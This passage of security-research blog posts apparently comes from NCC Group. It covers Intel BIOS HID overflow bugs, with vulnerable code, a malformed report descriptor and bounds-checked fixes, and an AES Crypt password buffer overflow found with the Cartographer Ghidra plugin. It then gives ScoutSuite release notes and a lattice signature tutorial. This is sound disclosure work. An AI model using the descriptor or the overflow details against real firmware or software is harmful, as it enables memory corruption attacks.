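    return bits / 8 + (bits % 8 != 0);
}
```

With fifty {ReportSize=7, ReportCount=0} items followed by one {ReportSize=8, ReportCount=1} item, led_report_bits() returns 8 and the truncating division yields a 1-byte allocation. A benign-looking report of three 1-bit LEDs is also mishandled: 3 / 8 truncates to 0 bytes, whereas rounding up gives 1.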

Next, the function will walk the Report list for a second time, once again seeking all LED-related Usage Pages.  

  UINT32         ByteIndex; 
  UINT32         BitIndex; 
  ... 
  ByteIndex = 0;  
  BitIndex  = 0;  
  ... 
  while (!IsNull (Link, Cur)) { 
    ReportItem = ITEM_FROM_LINK(Cur); 
    if (ReportItem->UsagePage == BT_HID_LED_USAGE_PAGE) { 
      ... 
      for (Index = ReportItem->UsageMin; Index <= ReportItem->UsageMax; Index++) { 
        if (HidKbDev->LedKeyState[Index] == TRUE) { 
          BitMask = Data[ByteIndex]; 
          BitMask = BitMask | (1 << BitIndex); 
          Data[ByteIndex] = BitMask; 
        } 
 
        BitIndex += ReportItem->ReportSize; 
        if (BitIndex == 7){ 
          ByteIndex ++; 
          BitIndex = 0;  
        } 
      }     
    }     
    Cur = GetNextNode (Link, Cur); 
  } 
  ... 

Above, the attacker has control over the UsageMin and UsageMax items, which can take on values as large as 255, even though LedKeyState[] has only 78 elements. This will cause the for-loop to take an excessive number of iterations.

Note also that BitIndex is attacker-controlled because it was derived from the attacker-controlled item named ReportItem->ReportSize. As I hinted earlier, the malformed descriptor will contain multiple Usage Pages which all have a Report Size of 7. This will force BitIndex to be 7 on each iteration of the for-loop, causing the “if(BitIndex==7)” condition to be entered each time. This will force ByteIndex to be incremented an excessive number of times.

Ultimately, this can lead to memory corruption, because ByteIndex is used as an offset adjustment when writing into Data[], the previously allocated 1-byte heap buffer.
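To get a feel for how far ByteIndex can travel, the index arithmetic of the second loop can be replayed without touching any memory. This is a model under stated assumptions: led_page_t and final_byte_index are names I made up, the LedKeyState[] lookup is left out entirely, and set_bit_checked is only one hypothetical way a write could be guarded, not Intel's actual patch.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* The three attacker-controlled values that drive the second loop. */
typedef struct {
    uint32_t usage_min;
    uint32_t usage_max;
    uint32_t report_size;
} led_page_t;

/*
 * Replay only the index arithmetic of the second loop (no memory is
 * written) and return the final ByteIndex.
 */
uint32_t final_byte_index(const led_page_t *pages, size_t n)
{
    uint32_t byte_index = 0, bit_index = 0;

    assert(pages != NULL || n == 0);
    for (size_t p = 0; p < n; p++) {
        /* 64-bit counter so the model terminates for any usage_max */
        for (uint64_t u = pages[p].usage_min; u <= pages[p].usage_max; u++) {
            bit_index += pages[p].report_size;
            if (bit_index == 7) {           /* same test as the listing */
                byte_index++;
                bit_index = 0;
            }
        }
    }
    return byte_index;
}

/* Hypothetical hardened write: refuses any bit outside the buffer. */
bool set_bit_checked(uint8_t *buf, size_t buf_len,
                     size_t byte_index, unsigned bit_index)
{
    if (buf == NULL || byte_index >= buf_len || bit_index > 7)
        return false;
    buf[byte_index] |= (uint8_t)(1u << bit_index);
    return true;
}
```

Feeding the model fifty pages of {UsageMin=0, UsageMax=255, ReportSize=7} followed by one page with ReportSize=8 gives a final ByteIndex of 50 × 256 = 12800, against a 1-byte allocation. In the last page BitIndex never equals 7 again, so it simply keeps growing, which is why the guarded write also rejects bit positions above 7.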

The malformed Report Descriptor that triggers this bug might look something like this: 

... 
// Multiple LED Usage Pages with: 
// - The broadest UsageMin/Max range (0-255) 
// - ReportSize of 7 and ReportCount of 0 
0x05, 0x08,        //     Usage Page (LED) 
0x19, 0x00,        //     Usage Minimum (0x00) 
0x29, 0xFF,        //     Usage Maximum (0xFF) 
0x75, 0x07,        //     Report Size (7) 
0x95, 0x00,        //     Report Count (0) 
// Repeated approximately 50 times ... 
... 
// NCC: One single Usage Page where ReportSize=8 and Count=1 
0x05, 0x08,        //     Usage Page (LED) 
0x19, 0x00,        //     Usage Minimum (0x00) 
0x29, 0xFF,        //     Usage Maximum (0xFF) 
0x75, 0x08,        //     Report Size (8) 
0x95, 0x01,        //     Report Count (1) 
... 

In terms of impact and exploitability, I should admit that I didn’t PoC this bug, and instead discovered it by pure code review. Although I haven’t ruled out exploitation, I admit that it may be difficult to translate this out-of-bounds write into arbitrary code execution for two reasons: 

  1. Due to how the value of BitMask is entangled with BitIndex and Data[ByteIndex]. That is, the BitMask value is read from Data[], modified, and written back into the same position. 
  2. The out-of-bounds writes are limited by the maximum value of ByteIndex, which is constrained by two additional factors: 
    • The range of UsageMin to UsageMax (255), which controls the number of iterations taken by the for-loop. 
    • The number of Usage Pages that can fit in the Descriptor, which controls the number of iterations taken by the while-loop. A rough calculation shows that approximately 50 Usage Pages can fit in the 512-byte report map (BT_HID_REPORT_MAP_LEN). 

Memory Corruption When Parsing Touch HID Report Stack

Impact

This vulnerability impacts another class of HID devices: touch panels, which transmit HID data over an I2C bus to the host. Unlike the previous bug which was exploitable by remote-but-nearby attackers via Bluetooth, this bug can only be exploited by a physical attacker who disassembles the laptop and tampers with I2C bus traffic. This may be accomplished by: 

  1. Implanting an interposer device which actively mutates HID reports as they are transmitted over the I2C serial bus. 
  2. Flashing malicious firmware onto the existing touch panel. 
  3. Replacing the entire touch panel or its microcontroller with one under the attacker’s control. 

An attacker that achieves this degree of physical access will be able to present the BIOS with a malformed HID Report. While parsing the tokenized report, memory corruption will occur in the BIOS, which could lead to code execution. 

Although the potential impact is high due to the possibility of code execution, the overall risk rating is tempered by the physical access requirement. Intel has a policy to not issue CVEs for vulnerabilities that involve “open chassis” attacks. 

Description

In the following code snippet, we can observe that a descriptor may contain multiple COLLECTION tokens. If an excessive number of these token types are present, the array index named CollectionCount will be repeatedly incremented. This can cause the value to become larger than the maximum valid index of the Stack->TempReport.Collection[] array.  

VOID UpdateStack( PARSER_STACK* Stack, TOKEN Token, INPUT_REPORT_TABLE* ReportTable ) 
{ 
  switch (Token.ID) { 
  ... 
  case COLLECTION: 
    ... 
    else if (Token.Value == LOGICAL) 
    { 
      if (Stack->TempReport.Collection[Stack->TempReport.CollectionCount - 1].ValidCollection  
            == TRUE) 
      { 
        Stack->TempReport.CollectionCount += 1; 
        Stack->TempReport.Collection[Stack->TempReport.CollectionCount - 1].BitsTotal =  
          Stack->TempReport.Collection[Stack->TempReport.CollectionCount - 2].BitsTotal; 
      } 
      Stack->TempReport.Collection[Stack->TempReport.CollectionCount - 1].ValidCollection =  
        TRUE; 
    } 
    break; 
  ... 

If an attacker were to trigger this bug, all subsequent writes to the Collection[] array (256 elements in size) would corrupt memory beyond the end of the report stack, which resides on the heap. 
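For illustration, a bounds-checked version of the LOGICAL collection branch might look like the sketch below. The types are simplified stand-ins for PARSER_STACK and its TempReport member (only the fields used in the snippet are kept), the function name is hypothetical, and this is not Intel's patch, which is not shown in this advisory. The 256-element limit is the array size mentioned above.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

#define MAX_COLLECTIONS 256   /* size of the Collection[] array */

/* Simplified stand-ins for the structures in the listing. */
typedef struct {
    bool     valid_collection;
    uint32_t bits_total;
} collection_t;

typedef struct {
    collection_t collection[MAX_COLLECTIONS];
    size_t       collection_count;  /* last slot in use is count - 1 */
} temp_report_t;

/*
 * Handle one LOGICAL collection token. Returns false when the token
 * cannot be recorded without indexing outside collection[], in which
 * case the caller should reject the whole descriptor.
 */
bool push_logical_collection(temp_report_t *r)
{
    assert(r != NULL);
    if (r->collection_count == 0 || r->collection_count > MAX_COLLECTIONS)
        return false;               /* count - 1 would be out of range */

    if (r->collection[r->collection_count - 1].valid_collection) {
        if (r->collection_count == MAX_COLLECTIONS)
            return false;           /* no free slot left */
        r->collection_count += 1;
        r->collection[r->collection_count - 1].bits_total =
            r->collection[r->collection_count - 2].bits_total;
    }
    r->collection[r->collection_count - 1].valid_collection = true;
    return true;
}
```

The first check also covers the case where the count is zero, since the original expression CollectionCount - 1 would then index before the start of the array.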

Disclosure Timeline 

  • October 12, 2022: NCC Group reports both vulnerabilities to Intel. Intel’s triage bot responds immediately indicating that the report has been sent to reviewers for disposition. 
  • December 7, 2022: NCC Group requests an update. Intel responds that the Bluetooth vulnerability is accepted as valid, but indicates that the I2C vulnerability is not valid due to the physical access requirement. However, Intel nonetheless intends to patch the weakness, so public disclosure is discouraged until they have shipped a BIOS update. 
  • January 18, 2023: Intel shares the CVE number and indicates that disclosure is targeted for later this year, in August. 
  • August 8, 2023: Disclosure publication in IPU 2023.3

Tool Release – ScoutSuite 5.13.0

We are excited to announce the release of a new version of our open-source, multi-cloud auditing tool ScoutSuite (on GitHub)!

This version includes multiple new rules and findings for Azure, which align with some of the latest CIS Benchmark checks, multiple bug fixes and feature enhancements, and minor finding template corrections. Supported Python versions have also been updated to cover versions 3.9 and newer.

The most significant changes are:

Core

  • Added support for Python versions >= 3.9; versions 3.8 and older are no longer recommended and support will not be provided for issues with these versions
  • Secret redaction logic improvements
  • Multiple error handling improvements

AWS

  • Multiple bugfixes for checks
  • Multiple minor corrections for finding templates

Azure

  • Multiple bugfixes for checks
  • Multiple minor corrections for finding templates
  • Updated azure-mgmt-authorization module to v3.0.0
  • Added new rules for several Azure CIS Benchmark checks

GCP

  • Multiple bugfixes for checks
  • Multiple minor corrections for finding templates

Check out the GitHub page and the Wiki documentation for more information about ScoutSuite.

For those wanting a Software-as-a-Service version, we also offer NCC Scout. This service includes persistent monitoring, as well as coverage of additional services across the three major public cloud platforms. If you would like to hear more, reach out to [email protected] or visit our cyberstore!

We would like to express our gratitude to all our contributors:

@FlorinAsavoaie
@yaleman
@tkmru
@elimisteve
@rbailey-godaddy
@rscottbailey
@x4v13r64
@twilson-bf
@x64-latacora
@zachfey
@wrightmalone
@fl0mb
@ncc-akis
@saez0pub
@HIKster
@cckev

Tool Release: Cartographer

Introduction

There’s no doubt that reverse engineering can be a very complex and confusing matter, even for those that love doing it. Jumping into a program and being greeted with tons of assembly and weirdly-named functions and variables is hardly what most would call a fun time. Not to mention that identifying specific functionality in a program can be an exercise in sanity at times.

That’s why today we’re releasing Cartographer: A Ghidra plugin for mapping out code coverage data.

Cartographer simplifies the complexities of reverse engineering by allowing researchers to visually observe which parts of a program were executed, obtain details about each function’s execution, compare different runs of the same program, and much more.

GitHub link: https://github.com/nccgroup/Cartographer

Overview

Back in 2017, a new and incredibly useful plugin for IDA Pro called Lighthouse appeared, which not only colorized code coverage data, but also provided many useful tools for researchers, such as displaying function heat maps and the ability to perform logical operations on multiple loaded coverages.

When Ghidra was released back in 2019, many researchers (myself included) eagerly awaited a version of Lighthouse for Ghidra. When 2022 rolled around and there was still no sign of a Ghidra version of Lighthouse, I decided to make my own.

Cartographer implements much of the same functionality as Lighthouse while also providing its own enhancements and offering additional Ghidra-specific functionality, such as the ability to load coverage data for binary overlays (i.e. segments that occupy the same memory addresses, but are located in different address spaces).

Below are two case studies showing the practical uses of Cartographer and how it can complement the reverse engineering workflow.

Case Study: AES Crypt

AES Crypt is a utility that encrypts and decrypts files utilizing AES. In August 2022, a critical vulnerability was discovered in the code for the Linux version of AES Crypt, specifically the code that prompts for user input.

Originally, this section was going to recreate that vulnerability and demonstrate how this sort of issue would be found using Cartographer. In fact, the entire setup and workflow for the demonstration had been entirely completed.

After drafting the demonstration, out of sheer curiosity, I decided to analyze the compiled Windows executable for AES Crypt just so I could see the differences between the two. However, instead of simply observing differences in their execution, I ended up discovering a previously-unreported buffer overflow vulnerability in the Windows version of AES Crypt.

First, code coverage from two different runs of the program was collected using DynamoRIO: One where an incorrect password was entered at the prompt, and one where an incorrect password was specified via the -p flag.

Once code coverage data was collected, the data from both of these code coverage files was loaded into Ghidra via Cartographer, with the prompt coverage being loaded first and the -p flag coverage loaded after.

Next, in Cartographer’s Code Coverage window, the expression B - A was used to isolate the functionality that only occurs in the coverage for the -p flag. The resulting coverage showed that only 2 functions had different executions from those in the prompt coverage.
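Conceptually, B - A is a set difference over the covered addresses. The sketch below models that idea on two sorted arrays of basic-block start addresses; it is not Cartographer's implementation (Cartographer is a Ghidra plugin), and the function name and the sorted, duplicate-free input format are assumptions made for the example.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/*
 * Write every address that appears in b but not in a to out and return
 * how many were written. Both inputs must be sorted in ascending order
 * without duplicates; out must have room for nb entries.
 */
size_t coverage_diff(const uint32_t *a, size_t na,
                     const uint32_t *b, size_t nb,
                     uint32_t *out)
{
    size_t i = 0, n = 0;

    assert((a != NULL || na == 0) && (b != NULL || nb == 0) && out != NULL);
    for (size_t j = 0; j < nb; j++) {
        while (i < na && a[i] < b[j])   /* skip blocks only seen in A */
            i++;
        if (i == na || a[i] != b[j])    /* b[j] was never hit in A */
            out[n++] = b[j];
    }
    return n;
}
```

If A is the prompt run and B is the -p run, whatever survives the difference is code that only executed when the password came from the command line, which is exactly where to start reading.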

Clicking on the 1st highlighted function (FUN_004053b0) and scrolling down to around line 96 shows the following decompiled code blocks (variables renamed for readability).

As shown above, the input string passed to the -p flag is added to the buf variable (defined as char buf [1024]) character-by-character, effectively creating a form of strcpy, and as such is vulnerable to a buffer overflow due to the unchecked length of the input buffer.
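For contrast, a bounded copy into a fixed-size buffer might look like the following. This is a generic sketch rather than AES Crypt's code or its eventual fix: copy_bounded is a hypothetical helper, and it assumes a plain NUL-terminated char string, whereas the real Windows binary may well handle its arguments differently.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

/*
 * Copy src, including its terminating NUL, into dst. If src does not
 * fit in dst_size bytes, dst is set to the empty string and false is
 * returned, so an over-long input is rejected instead of truncated.
 */
bool copy_bounded(char *dst, size_t dst_size, const char *src)
{
    assert(dst != NULL && src != NULL && dst_size > 0);

    size_t len = strlen(src);
    if (len >= dst_size) {          /* no room for the NUL terminator */
        dst[0] = '\0';
        return false;
    }
    memcpy(dst, src, len + 1);
    return true;
}
```

Rejecting an over-long password outright, rather than silently truncating it, avoids deriving a key from something other than what the user typed.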

By passing a specially-crafted input string to the application, it is possible to overwrite the address of the SEH handler and redirect execution to an arbitrary address in memory.

Case Study: Animal Crossing

Many gamers have fond memories of playing Animal Crossing for the Nintendo GameCube growing up, but what they may not realize is that the developers left significant amounts of debug functionality within the final game.

First, code coverage data was collected starting from system boot to the point where “Press START!” appears on the screen.

Next, the game’s main executable, main.dol, was loaded into Ghidra using the Ghidra GameCube Loader plugin. Once the executable completed auto-analysis, the code coverage data was loaded via Cartographer.

Within the boot::main function, the game version (offset 0x7 of the disk header) is checked to see if the version is 0x99, then checked twice more to see if the version is greater than 0x8F. When the 3rd condition is true, something called “ZURUMODE2” is enabled.

According to the code above, setting the 8th byte of the disk header to 0x99 should enable this “zuru mode”. When this value is set and the game is booted up, the regular Nintendo trademark screen will have significantly more information displayed, indicative of some form of debug mode being enabled.

Additionally, the game will now have debug information displayed on the screen, with various screens and displays able to be toggled by using an additional controller plugged in to the 2nd controller port.

Note: As I was typing up this part of this blog post, I came across an old PDF that I had originally stumbled upon years ago that first introduced me to this debug functionality, titled Secrets of Animal Crossing. What I didn’t know was that the author was James Chambers, a fellow colleague here at NCC Group.

I’d highly recommend checking out James’ full write-up of the inner workings of Animal Crossing’s developer mode on his blog: Reverse engineering Animal Crossing’s developer mode

Conclusion

As shown in the case studies above, Cartographer can significantly reduce the complexities of reverse engineering and help with isolating target functionality, whether it’s analyzing code being executed or code not being executed.

If you have any suggestions for improvements or ideas for features, feel free to open an issue or create a pull request on GitHub!
https://github.com/nccgroup/Cartographer

Building Intuition for Lattice-Based Signatures – Part 1: Trapdoor Signatures

Introduction

Since the first lattice-based cryptography results in [Ajtai96], lattices have become a central building block in quantum-resistant cryptosystems. Lattice-based cryptography starts from the problem of solving systems of linear equations and adds size constraints or error terms to these systems, turning them into quantum-computer-resistant one-way or trapdoor functions. Since the first theoretical cryptosystems of the 1990s and early 2000s, lattice-based cryptography has been a very active area of research, resulting in ever-more practical signature and encryption schemes, and yielding many advances in areas such as fully-homomorphic encryption.

This two-part blog series aims to provide some intuition on the main building blocks that are used in the construction of the two lattice-based signature schemes selected for standardization by the National Institute of Standards and Technology (NIST), Dilithium and Falcon, and showcases the techniques used in many other lattice-based constructions. This first part will describe a construction using lattice-based trapdoor functions and the hash-and-sign paradigm, which is at the core of the signature scheme Falcon. The second part will describe a construction based on the Fiat-Shamir paradigm, which is at the core of the signature scheme Dilithium.

Lattice Background

Before diving into signature constructions, we must first introduce a few concepts about lattices and lattice-based hard problems.

At a high level, lattices can simply be thought of as the restriction of vector spaces to a discrete subgroup. In particular, a lattice is defined as the set of integer linear combinations of a set of basis vectors B = \{\vec{b}_1, \dots, \vec{b}_n\} \subseteq \mathbb{R}^n. For simplicity, we often restrict ourselves to integer lattices, i.e. lattices with basis vectors chosen from \mathbb{Z}^n.

Similarly to vector spaces, a lattice can be defined by an infinite number of equivalent bases. Two bases B_1 and B_2 define the same lattice if every point in the lattice generated by B_1 can also be generated as an integer linear combination of the basis B_2, and vice versa (see footnote 1). For example, the two-dimensional lattice \Lambda generated by B_1 = \left\{\begin{bmatrix}10\\7\end{bmatrix}, \begin{bmatrix}9\\6\end{bmatrix}\right\} can instead be generated from the basis B_2 = \left\{\begin{bmatrix}2\\-1\end{bmatrix}, \begin{bmatrix}1\\1\end{bmatrix}\right\}, as depicted below.

Note that, unlike standard vector spaces, not all linearly independent sets of n lattice vectors form a basis for a given lattice. For example, the set \left\{\begin{bmatrix}2\\-1\end{bmatrix}, \begin{bmatrix}2\\2\end{bmatrix}\right\} is not a basis for the lattice \Lambda, as there is no integer linear combination of these two vectors that generates the lattice vector \begin{bmatrix}3\\0\end{bmatrix}, while we can write \begin{bmatrix}3\\0\end{bmatrix} = \begin{bmatrix}2\\-1\end{bmatrix} + \begin{bmatrix}1\\1\end{bmatrix} = -6\begin{bmatrix}10\\7\end{bmatrix} + 7\begin{bmatrix}9\\6\end{bmatrix}.
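To make the notion of equivalent bases concrete, here is a minimal Python sketch that checks the example bases from this section. The helper names (solve_2x2, in_lattice, same_lattice) are ours and purely illustrative; the check only handles two-dimensional integer bases and relies on exact rational arithmetic.

```python
from fractions import Fraction

def solve_2x2(basis, target):
    """Return (a, b) such that a*basis[0] + b*basis[1] == target (Cramer's rule)."""
    (p, q), (r, s) = basis
    det = p * s - q * r
    a = Fraction(target[0] * s - target[1] * r, det)
    b = Fraction(p * target[1] - q * target[0], det)
    return a, b

def in_lattice(basis, v):
    """v is a lattice point iff its coefficients in the basis are integers."""
    return all(c.denominator == 1 for c in solve_2x2(basis, v))

def same_lattice(b1, b2):
    """Two bases are equivalent iff each generates all vectors of the other."""
    return (all(in_lattice(b1, v) for v in b2)
            and all(in_lattice(b2, v) for v in b1))

B1 = [(10, 7), (9, 6)]
B2 = [(2, -1), (1, 1)]
NOT_A_BASIS = [(2, -1), (2, 2)]

print(same_lattice(B1, B2))             # True: both generate the same lattice
print(same_lattice(B2, NOT_A_BASIS))    # False: (1, 1) needs a coefficient of 1/2
print(in_lattice(NOT_A_BASIS, (3, 0)))  # False, although (3, 0) is in the lattice
```

The coefficients returned by solve_2x2(B1, (3, 0)) are -6 and 7, matching the decomposition given in the text.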

Each basis B naturally corresponds to a space known as the fundamental parallelepiped, defined as the set \mathcal{P}(B) = [0,1)^n \times B = \{\vec{x}: \vec{x} = \sum_{i = 1}^n a_i\vec{b_i} \text{, such that } a_i \in [0,1) \text{ for all } i\}. Graphically, this corresponds to the n-dimensional parallelepiped with sides equal to the basis vectors, and defines a natural tiling for the space underlying the lattice. While a fundamental parallelepiped is closely tied to the basis that generated it, and is thus not unique for a given lattice, the volume enclosed by a fundamental parallelepiped is identical regardless of which lattice basis is chosen, and is thus a lattice invariant.
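As a small illustration of the volume invariant, the following sketch (with hypothetical helper names) computes the area of the fundamental parallelepiped for the example bases, and reduces a point modulo the parallelepiped by keeping only the fractional parts of its basis coefficients. It is restricted to two dimensions for readability.

```python
from fractions import Fraction
from math import floor

def det2(basis):
    (p, q), (r, s) = basis
    return p * s - q * r

def reduce_mod_parallelepiped(basis, x):
    """Map x to the unique point of P(B) that differs from x by a lattice vector."""
    (p, q), (r, s) = basis
    det = det2(basis)
    a = Fraction(x[0] * s - x[1] * r, det)   # coefficient of the first basis vector
    b = Fraction(p * x[1] - q * x[0], det)   # coefficient of the second basis vector
    a, b = a - floor(a), b - floor(b)        # keep the fractional parts, in [0, 1)
    return (a * p + b * r, a * q + b * s)

B1 = [(10, 7), (9, 6)]
B2 = [(2, -1), (1, 1)]
SUBLATTICE = [(2, -1), (2, 2)]  # generates only part of the lattice

# Equivalent bases enclose the same area; the non-basis encloses twice as much.
print(abs(det2(B1)), abs(det2(B2)), abs(det2(SUBLATTICE)))  # 3 3 6

# Lattice points reduce to the origin, whichever basis is used.
print(reduce_mod_parallelepiped(B1, (3, 0)) == (0, 0))  # True
print(reduce_mod_parallelepiped(B2, (3, 0)) == (0, 0))  # True
```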

Some of the (conjectured) hardest computational problems over lattices are finding short vectors in an arbitrary lattice, known as the Shortest Vector Problem (SVP), and finding the lattice point closest to a target \vec{t} \in \mathbb{R}^n, known as the Closest Vector Problem (CVP). We can also define approximation versions of each, SVP_\gamma and CVP_\gamma, which ask to find a short vector whose length is at most a multiplicative approximation factor \gamma \geq 1 times the length of the shortest vector, or a lattice vector whose distance from the target is at most a multiplicative approximation factor \gamma \geq 1 times the distance of the closest vector from the target, respectively.

The effort required to solve each of the problems increases with the dimension n, and as the approximation factor gets closer to \gamma = 1. In particular, while there exist efficient algorithms for solving the SVP and the CVP for low dimension such as n=2 or for exponential approximation factors \gamma = 2^{O(n)}, the problems are NP-hard for large dimensions n and low approximation factors. Modern lattice cryptography chooses underlying problems with dimension around n = 512 and approximation factors around \widetilde{O}(n), although the exact choices of parameters for the constructions we present will be omitted from this blog post for simplicity.

Note:
Lattices can be defined over a number of various algebraic structures. They can be defined over the real numbers, such as the examples above, but are often defined over \mathbb{Z}_q, rings or modules, as those result in more efficient implementations due to the presence of additional structure within the lattice. Whether this extra structure affects the hardness of lattice problems is an open question, but to the best knowledge of the community it is not exploitable in the cryptographic settings.

In both of our examples in this blog post series, we will use one particular family of lattices known as the q-ary lattices, which are defined as follows, for some A \in \mathbb{Z}_q^{n \times m}:

\Lambda(A) = \{y \in \mathbb{Z}^m: y = A^Ts\mod{q} \text{ for } s \in \mathbb{Z}^n\}
\Lambda^\perp(A) = \{e \in \mathbb{Z}^m: Ae \equiv 0 \mod{q}\}.

These lattices are mutually orthogonal modulo q, as each consists of exactly the vectors orthogonal (modulo q) to all the vectors in the other one. This property is particularly useful for checking membership of a vector in a lattice: if B is a basis for \Lambda^\perp(A), then checking if x \in \Lambda(A) can be done by checking whether Bx \equiv 0 \mod{q}, and similarly checking whether y \in \Lambda^\perp(A) can be done by the check Ay \equiv 0 \mod{q}.
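The membership check and the orthogonality property can be illustrated with a tiny example. The matrix A and the modulus q below are arbitrary values chosen for illustration only; they are far too small for any cryptographic use.

```python
q = 7
A = [[1, 2, 3],
     [4, 5, 6]]  # n = 2 rows, m = 3 columns (illustrative values)

def times_A(e):
    """Compute A*e mod q."""
    return [sum(a * x for a, x in zip(row, e)) % q for row in A]

def in_perp_lattice(e):
    """e is in Lambda^perp(A) iff A*e = 0 mod q."""
    return all(c == 0 for c in times_A(e))

def point_of_lambda(s):
    """Return y = A^T s mod q, a representative of a point of Lambda(A)."""
    return [sum(a * x for a, x in zip(col, s)) % q for col in zip(*A)]

e = [1, -2, 1]            # A*e = 0 even over the integers
y = point_of_lambda([3, 5])

print(in_perp_lattice(e))          # True
print(in_perp_lattice([7, 0, 0]))  # True: multiples of q are always in the lattice
print(in_perp_lattice([1, 1, 1]))  # False
print(sum(a * b for a, b in zip(y, e)) % q)  # 0: y and e are orthogonal mod q
```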

The more practical constructions, including the NIST submissions Falcon and Dilithium, often choose orthogonal lattices over rings or modules as the basis of their constructions. For the rest of this blog post, we will generally not go into the details of the specific rings or modules used, for simplicity, but we will mention what lattice constructions are used in practice.

Constructing Signatures Using Hash-and-Sign and CVP

The first construction for lattice-based signature schemes uses the hash-and-sign paradigm, and relies on the hardness of the CVP problem. The hash-and-sign paradigm was first introduced by Bellare and Rogaway [BR96] to construct the RSA Full Domain Hash (FDH) signature scheme, and relies on a secret trapdoor function for the construction of signatures.

The basic idea is simple: Suppose we have a trapdoor function f such that f is efficiently computable, but very hard to invert (i.e. f^{-1} is difficult to compute) without additional information. To sign a message m, we can hash m to a point t = H(m) in the range of the function f, and use the secret f^{-1} to compute the signature \sigma = f^{-1}(t). To verify a signature (m, \sigma), simply compute t' = f(\sigma) and check whether t' = H(m).

In particular, choosing the trapdoor permutation function f(\sigma) = \sigma^e \mod(N) and inverse f^{-1}(t) = t^d \mod(N) in the above set-up recovers the RSA FDH scheme.
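For readers who prefer code, here is a toy sketch of the hash-and-sign flow instantiated with RSA. Everything in it is illustrative: the modulus is built from two small Mersenne primes and is trivially factorable, and SHA-256 reduced modulo N is only a stand-in for a proper full-domain hash. It requires Python 3.8 or later for the modular inverse via pow.

```python
import hashlib

# Toy parameters: two known Mersenne primes. Real RSA moduli are 2048+ bits.
P, Q = 2**61 - 1, 2**89 - 1
N = P * Q
E = 65537
D = pow(E, -1, (P - 1) * (Q - 1))  # secret trapdoor information

def H(message: bytes) -> int:
    """Simplified stand-in for a full-domain hash onto Z_N."""
    return int.from_bytes(hashlib.sha256(message).digest(), "big") % N

def f(sigma: int) -> int:
    """Public, easy direction: f(sigma) = sigma^e mod N."""
    return pow(sigma, E, N)

def f_inverse(t: int) -> int:
    """Hard direction, easy only with the secret exponent d."""
    return pow(t, D, N)

def sign(message: bytes) -> int:
    return f_inverse(H(message))

def verify(message: bytes, sigma: int) -> bool:
    return f(sigma) == H(message)

signature = sign(b"hello lattices")
print(verify(b"hello lattices", signature))   # True
print(verify(b"another message", signature))  # False
```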

The Hard Problem

To see how to construct a hash-and-sign trapdoor function using lattice-based primitives, consider the closest vector problem. The CVP_\gamma is a hard problem to solve (see footnote 2) for a random lattice, but it is easy to verify a given solution: given a target \vec{t} and a candidate solution (i.e. candidate close lattice vector) \vec{v}, it is easy to check that \vec{v} is in a given lattice, by checking whether it can be written as an integer linear combination of the basis vectors, and whether \vec{v} is within the specified distance of the target by computing \|\vec{v} - \vec{t}\|.

However, in order to use the CVP_\gamma to construct a trapdoor function, we need to find a way to tie the hardness of the CVP_\gamma to some secret data, i.e. ensure that a close vector can easily be found using the secret data, but is very hard to find without it. The central idea used here is the observation that not all lattice bases are created equal, and that some bases allow us to solve hard lattice problems such as CVP_\gamma more efficiently than others. Crucially, while any basis can be used to verify the correctness of a CVP_\gamma solution (as they all define the same lattice, and thus can all be used to check a candidate solution’s membership in the lattice), the quality of a CVP_\gamma solution one can find (i.e. the distance from the target, measured by the size of the \gamma factor) depends on the basis one started off with. To see why, consider the following intuitive algorithm for solving CVP_\gamma, called Babai’s round-off algorithm:

Given a basis B and a target point \vec{t}, one can use the known basis to round to a nearby lattice point as follows: write the target point as a linear combination of the basis vectors, \vec{t} = \sum_{i = 1}^n a_i \vec{b_i}. Then, round each coefficient a_i to the nearest integer, to obtain \vec{v} = \sum_{i = 1}^n \lfloor a_i \rceil \vec{b_i}. Writing B for the matrix whose rows are the basis vectors, these operations can be expressed as \vec{v} = \lfloor \vec{t}B^{-1}\rceil B. Since any integer linear combination of lattice vectors is a lattice vector, the result \vec{v} is a lattice vector near \vec{t}, which corresponds to the nearest corner of the fundamental parallelepiped translate containing \vec{t}.

Intuitively, shorter (and more orthogonal) bases lead to more reliable results from Babai’s rounding algorithm. This can be formalized by observing that the maximum distance from the target contributed at step i is given by \|\frac{1}{2}\vec{b_i}\| (since the solution found will be at one of the corners of the containing fundamental parallelepiped), and hence by the triangle inequality the distance \|\vec{t} - \vec{v}\| is bounded by \frac{1}{2}\sum_{i=1}^n \|\vec{b_i}\|.
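The round-off procedure and the effect of the basis quality can be sketched in a few lines of Python. This is a two-dimensional illustration using the example bases from the Lattice Background section; the function names and the target point (5, 3) are our own choices, and targets are assumed to have integer or rational coordinates.

```python
from fractions import Fraction
from math import hypot

def coefficients(basis, t):
    """Solve t = a*b1 + b*b2 over the rationals (Cramer's rule)."""
    (p, q), (r, s) = basis
    det = p * s - q * r
    return (Fraction(t[0] * s - t[1] * r, det),
            Fraction(p * t[1] - q * t[0], det))

def babai_round_off(basis, t):
    """Round each coefficient of t to the nearest integer and recombine."""
    a, b = (round(c) for c in coefficients(basis, t))
    (p, q), (r, s) = basis
    return (a * p + b * r, a * q + b * s)

def distance(u, v):
    return hypot(u[0] - v[0], u[1] - v[1])

def round_off_bound(basis):
    """The triangle-inequality bound: half the sum of the basis vector lengths."""
    return sum(hypot(*b) for b in basis) / 2

GOOD_BASIS = [(2, -1), (1, 1)]
BAD_BASIS = [(10, 7), (9, 6)]
target = (5, 3)

for basis in (GOOD_BASIS, BAD_BASIS):
    v = babai_round_off(basis, target)
    print(v, distance(v, target), "<=", round_off_bound(basis))
```

With the short basis the algorithm returns (6, 3), at distance 1 from the target, while the long basis returns (8, 5), which is a valid lattice point but noticeably further away.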

This can be seen in practice, by finding instances where two different bases find different solutions to the CVP_\gamma, such as when the nearest lattice point is not in the fundamental parallelepiped containing the target point. Two examples of differing solutions can be seen in the following figure:

Thus, to instantiate our trapdoor algorithm, one needs to find a good basis, that allows us to solve CVP_\gamma to within a certain bound, as well as a bad basis, that does not allow solving CVP_\gamma without significant computational costs, but still allows one to verify solutions.

Note:
One method for generating this pair of bases is to choose a “good” basis, and apply a transformation to it to obtain a “bad” basis. A common choice of “bad” basis is the Hermite Normal Form (HNF) of the lattice, as it is in a sense the worst possible basis: the same HNF can be generated from any basis of a given lattice, and thus the HNF reveals no information about the basis it was generated from.

A First Attempt

